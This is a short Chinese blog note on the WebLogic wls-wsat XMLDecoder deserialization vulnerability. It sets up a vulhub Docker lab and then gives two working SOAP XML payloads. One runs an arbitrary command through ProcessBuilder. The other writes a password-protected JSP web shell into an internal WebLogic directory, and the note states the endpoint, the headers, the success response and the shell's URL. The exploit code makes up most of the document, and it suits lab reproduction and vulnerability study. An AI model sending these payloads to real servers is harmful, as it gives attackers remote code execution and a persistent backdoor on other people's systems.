weblogic xml漏洞小记 2018-02-01 02:18:27 Steven Xeldax ## 0x01 weblogic docker vulhub ``` docker vulhub docker-compose build docker-compose up -d ``` ## 0x02 POC ``` <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>calc</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` 向/wls-wsat/CoordinatorPortType发起一个POST请求,body部分为上面的内容,修改Content-Type为text/xml 目前了解的uri还有CoordinatorPortType11 > 服务器返回 ``` <faultcode>S:Server</faultcode> <faultstring>0</faultstring> ``` > 说明执行成功 ## 0x03 Getshell ``` <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java><java version="1.4.0" class="java.beans.XMLDecoder"> <object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/a.jsp</string><void method="println"> <string><![CDATA[<%if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("</pre>");} %>]]></string></void><void method="close"/> </object> </java> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope> ``` 会在tmp/_WL_internal下bea_wls9_async_response、bea_wls_internal和uddiexplorer目录中的war包下创建a.jsp文件,具体路径可自己选择,对应的web路径是 ``` http://x.x.x.x:7001/bea_wls_internal/a.jsp ```
